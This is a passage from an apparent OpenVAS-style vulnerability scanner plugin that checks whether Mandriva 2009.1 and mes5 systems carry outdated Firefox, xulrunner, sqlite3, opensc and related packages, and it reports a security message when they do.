exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ar\", rpm:\"firefox-ar~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-be\", rpm:\"firefox-be~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bg\", rpm:\"firefox-bg~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bn\", rpm:\"firefox-bn~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ca\", rpm:\"firefox-ca~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cs\", rpm:\"firefox-cs~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cy\", rpm:\"firefox-cy~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-da\", rpm:\"firefox-da~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-de\", rpm:\"firefox-de~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-devel\", rpm:\"firefox-devel~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-el\", rpm:\"firefox-el~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-en_GB\", rpm:\"firefox-en_GB~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eo\", rpm:\"firefox-eo~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_AR\", rpm:\"firefox-es_AR~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_ES\", rpm:\"firefox-es_ES~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-et\", rpm:\"firefox-et~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eu\", rpm:\"firefox-eu~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-beagle\", rpm:\"firefox-ext-beagle~0.3.9~9.12mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-blogrovr\", rpm:\"firefox-ext-blogrovr~1.1.804~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-mozvoikko\", rpm:\"firefox-ext-mozvoikko~1.0~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-r-kiosk\", rpm:\"firefox-ext-r-kiosk~0.8.0~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-scribefire\", rpm:\"firefox-ext-scribefire~3.5.1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-xmarks\", rpm:\"firefox-ext-xmarks~3.5.10~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fi\", rpm:\"firefox-fi~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fr\", rpm:\"firefox-fr~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fy\", rpm:\"firefox-fy~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ga_IE\", rpm:\"firefox-ga_IE~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gl\", rpm:\"firefox-gl~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gu_IN\", rpm:\"firefox-gu_IN~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-he\", rpm:\"firefox-he~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hi\", rpm:\"firefox-hi~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hu\", rpm:\"firefox-hu~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-id\", rpm:\"firefox-id~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-is\", rpm:\"firefox-is~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-it\", rpm:\"firefox-it~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ja\", rpm:\"firefox-ja~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-kn\", rpm:\"firefox-kn~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ko\", rpm:\"firefox-ko~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lt\", rpm:\"firefox-lt~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lv\", rpm:\"firefox-lv~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mk\", rpm:\"firefox-mk~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mr\", rpm:\"firefox-mr~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nb_NO\", rpm:\"firefox-nb_NO~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nl\", rpm:\"firefox-nl~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nn_NO\", rpm:\"firefox-nn_NO~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pa_IN\", rpm:\"firefox-pa_IN~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pl\", rpm:\"firefox-pl~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_BR\", rpm:\"firefox-pt_BR~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_PT\", rpm:\"firefox-pt_PT~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ro\", rpm:\"firefox-ro~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ru\", rpm:\"firefox-ru~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-si\", rpm:\"firefox-si~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sk\", rpm:\"firefox-sk~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sl\", rpm:\"firefox-sl~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sq\", rpm:\"firefox-sq~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sv_SE\", rpm:\"firefox-sv_SE~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-te\", rpm:\"firefox-te~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-th\", rpm:\"firefox-th~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-theme-kfirefox\", rpm:\"firefox-theme-kfirefox~0.16~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-tr\", rpm:\"firefox-tr~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-uk\", rpm:\"firefox-uk~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_CN\", rpm:\"firefox-zh_CN~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_TW\", rpm:\"firefox-zh_TW~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-extras\", rpm:\"gnome-python-extras~2.25.3~3.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gda\", rpm:\"gnome-python-gda~2.25.3~3.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gda-devel\", rpm:\"gnome-python-gda-devel~2.25.3~3.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gdl\", rpm:\"gnome-python-gdl~2.25.3~3.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkhtml2\", rpm:\"gnome-python-gtkhtml2~2.25.3~3.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkmozembed\", rpm:\"gnome-python-gtkmozembed~2.25.3~3.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkspell\", rpm:\"gnome-python-gtkspell~2.25.3~3.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"google-gadgets-common\", rpm:\"google-gadgets-common~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"google-gadgets-gtk\", rpm:\"google-gadgets-gtk~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"google-gadgets-qt\", rpm:\"google-gadgets-qt~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"google-gadgets-xul\", rpm:\"google-gadgets-xul~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lemon\", rpm:\"lemon~3.6.23.1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libggadget1.0_0\", rpm:\"libggadget1.0_0~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libggadget-gtk1.0_0\", rpm:\"libggadget-gtk1.0_0~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libggadget-qt1.0_0\", rpm:\"libggadget-qt1.0_0~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgoogle-gadgets-devel\", rpm:\"libgoogle-gadgets-devel~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopensc2\", rpm:\"libopensc2~0.11.7~1.11mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopensc-devel\", rpm:\"libopensc-devel~0.11.7~1.11mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3_0\", rpm:\"libsqlite3_0~3.6.23.1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3-devel\", rpm:\"libsqlite3-devel~3.6.23.1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3-static-devel\", rpm:\"libsqlite3-static-devel~3.6.23.1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner1.9.2.3\", rpm:\"libxulrunner1.9.2.3~1.9.2.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner-devel\", rpm:\"libxulrunner-devel~1.9.2.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-plugin-opensc\", rpm:\"mozilla-plugin-opensc~0.11.7~1.11mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-beagle\", rpm:\"mozilla-thunderbird-beagle~0.3.9~9.12mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"opensc\", rpm:\"opensc~0.11.7~1.11mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sqlite3-tools\", rpm:\"sqlite3-tools~3.6.23.1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tcl-sqlite3\", rpm:\"tcl-sqlite3~3.6.23.1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~1.9.2.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"yelp\", rpm:\"yelp~2.26.0~3.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-l10n\", rpm:\"firefox-l10n~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"google-gadgets\", rpm:\"google-gadgets~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sqlite3\", rpm:\"sqlite3~3.6.23.1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64ggadget1.0_0\", rpm:\"lib64ggadget1.0_0~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64ggadget-gtk1.0_0\", rpm:\"lib64ggadget-gtk1.0_0~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64ggadget-qt1.0_0\", rpm:\"lib64ggadget-qt1.0_0~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64google-gadgets-devel\", rpm:\"lib64google-gadgets-devel~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64opensc2\", rpm:\"lib64opensc2~0.11.7~1.11mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64opensc-devel\", rpm:\"lib64opensc-devel~0.11.7~1.11mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3_0\", rpm:\"lib64sqlite3_0~3.6.23.1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3-devel\", rpm:\"lib64sqlite3-devel~3.6.23.1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3-static-devel\", rpm:\"lib64sqlite3-static-devel~3.6.23.1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner1.9.2.3\", rpm:\"lib64xulrunner1.9.2.3~1.9.2.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner-devel\", rpm:\"lib64xulrunner-devel~1.9.2.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~3.6.3~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-af\", rpm:\"firefox-af~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ar\", rpm:\"firefox-ar~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-be\", rpm:\"firefox-be~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bg\", rpm:\"firefox-bg~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bn\", rpm:\"firefox-bn~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ca\", rpm:\"firefox-ca~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cs\", rpm:\"firefox-cs~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cy\", rpm:\"firefox-cy~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-da\", rpm:\"firefox-da~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-de\", rpm:\"firefox-de~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-devel\", rpm:\"firefox-devel~3.6.3~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-el\", rpm:\"firefox-el~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-en_GB\", rpm:\"firefox-en_GB~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eo\", rpm:\"firefox-eo~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_AR\", rpm:\"firefox-es_AR~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_ES\", rpm:\"firefox-es_ES~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-et\", rpm:\"firefox-et~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eu\", rpm:\"firefox-eu~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fi\", rpm:\"firefox-fi~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fr\", rpm:\"firefox-fr~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fy\", rpm:\"firefox-fy~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ga_IE\", rpm:\"firefox-ga_IE~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gl\", rpm:\"firefox-gl~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gu_IN\", rpm:\"firefox-gu_IN~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-he\", rpm:\"firefox-he~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hi\", rpm:\"firefox-hi~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hu\", rpm:\"firefox-hu~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-id\", 